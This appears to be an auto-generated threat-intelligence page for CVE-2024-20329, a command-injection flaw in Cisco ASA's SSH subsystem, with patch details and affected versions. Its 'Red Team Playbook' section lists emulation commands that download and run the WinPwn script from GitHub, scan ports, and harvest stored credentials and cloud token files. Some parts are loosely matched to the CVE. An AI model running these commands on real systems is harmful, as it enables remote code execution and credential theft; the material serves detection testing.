CVE-2024-20329
Overview
This vulnerability is a command injection flaw stemming from insufficient validation of user input within the SSH subsystem of Cisco Adaptive Security Appliance (ASA) Software. Specifically, the remote CLI command execution interface over SSH fails to properly sanitize crafted input, allowing unauthorized command interpretation. The affected component is the SSH command execution handler in ASA Software versions 9.17.1 and its minor revisions.
Vulnerability Description
A vulnerability in the SSH subsystem of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to execute operating system commands as root. This vulnerability is due to insufficient validation of user input. An attacker could exploit this vulnerability by submitting crafted input when executing remote CLI commands over SSH. A successful exploit could allow the attacker to execute commands on the underlying operating system with root-level privileges. An attacker with limited user privileges could use this vulnerability to gain complete control over the system.
Impact
An attacker with valid SSH credentials can exploit this vulnerability to execute arbitrary commands with root privileges on the ASA device. This enables full system compromise, including unauthorized configuration changes, data exfiltration, or network disruption. The exploit requires network access to the SSH service and low privilege authentication (PR:L) but no user interaction (UI:N). The CVSS vector (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) confirms the high severity and potential for complete system control and confidentiality, integrity, and availability impact.
Solution
Cisco has released patches addressing this vulnerability in ASA Software versions 9.17.1.12 and later. Administrators should apply the updates as detailed in Cisco Security Advisory cisco-sa-asa-ssh-rce-gRAuPEUF available at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssh-rce-gRAuPEUF. No alternative mitigations are documented; prompt patching is recommended to remediate the root cause.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability has been identified in the SSH subsystem of Cisco Adaptive Security Appliance (ASA) Software, which stems from insufficient validation of user input. This flaw allows an authenticated remote attacker to execute operating system commands with root privileges. The underlying issue lies in how the system processes commands sent via the remote command-line interface (CLI) over SSH. If an attacker submits specially crafted input, they can bypass security controls and gain unauthorized access to the system's core functionalities, effectively compromising the integrity and confidentiality of the device.
The primary attack vector for this vulnerability involves authenticated users who have limited privileges. By exploiting the input validation flaw, an attacker can escalate their privileges to root level, which is the highest level of access on the system. This exploitation could occur in various scenarios, such as during routine administrative tasks where SSH is used for remote management. An attacker could craft malicious commands that, when executed, could manipulate system settings, install backdoors, or exfiltrate sensitive data. The potential for lateral movement within a network is significant, as gaining root access to a security appliance could provide pathways to other connected systems or sensitive resources.
The real-world impact of this vulnerability is profound, particularly for organizations relying on Cisco ASA for their network security. The ability to execute commands as root could lead to severe business risks, including data breaches, service disruptions, and loss of customer trust. For enterprises, the financial repercussions could be substantial, encompassing costs related to incident response, regulatory fines, and potential lawsuits. Additionally, the reputational damage associated with a security breach can have long-lasting effects, making it imperative for organizations to address such vulnerabilities promptly.
To detect and mitigate this vulnerability, organizations should implement a robust security posture that includes regular vulnerability assessments and penetration testing. Monitoring SSH access logs for unusual activity can help identify potential exploitation attempts. Furthermore, organizations should enforce the principle of least privilege, ensuring that users have only the necessary permissions to perform their tasks. Applying security patches and updates provided by Cisco is crucial, as these updates often contain fixes for known vulnerabilities. Additionally, implementing intrusion detection systems (IDS) can help in identifying and alerting on suspicious command executions or unauthorized access attempts.
In conclusion, the vulnerability in the SSH subsystem of Cisco ASA Software poses a significant threat to the security of affected systems. Its potential for exploitation by authenticated users highlights the necessity for stringent input validation and access controls. Organizations must remain vigilant in monitoring their systems, applying timely updates, and fostering a culture of security awareness among users to mitigate the risks associated with this and similar vulnerabilities. By taking proactive measures, businesses can better protect their assets and maintain the integrity of their network security infrastructure.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2024-20329, with our telemetry indicating new instances of exploitation attempts targeting the SSH subsystem of Cisco ASA devices. Although the overall exploit prevalence remains low and the EPSS score stable, this uptick signals increasing adversary interest and potential reconnaissance or initial access efforts leveraging this critical vulnerability. The shift from theoretical risk to observed exploitation attempts elevates the threat posture, underscoring that threat actors are actively probing for opportunities to execute root-level commands remotely. Defenders should interpret this development as a warning that the vulnerability is moving closer to active exploitation in the wild, which could lead to more frequent and impactful attacks if left unaddressed.
Affected Products (27)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Adaptive Security Appliance Software | 9.17.1 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.17.1:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.17.1.7 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.17.1.7:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.17.1.9 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.17.1.9:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.17.1.10 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.17.1.10:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.17.1.11 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.17.1.11:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.17.1.13 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.17.1.13:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.17.1.15 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.17.1.15:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.17.1.20 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.17.1.20:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.17.1.30 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.17.1.30:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.17.1.33 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.17.1.33:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.18.1 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.18.1:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.18.1.3 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.18.1.3:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.18.2 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.18.2:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.18.2.5 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.18.2.5:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.18.2.7 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.18.2.7:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.18.2.8 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.18.2.8:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.18.3 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.18.3:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.18.3.39 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.18.3.39:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.18.3.46 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.18.3.46:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.18.3.53 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.18.3.53:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
2 eventsSighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-6 | Argument Injection |
48%
|
High | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-20329 |
| sec.cloudapps.cisco.com |
GitHub CVE
|
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssh-rce-gRAuPEUF |
| sec.cloudapps.cisco.com |
GitHub CVE
|
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-xss-M446vbEO |
| sec.cloudapps.cisco.com |
GitHub CVE
|
https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300 |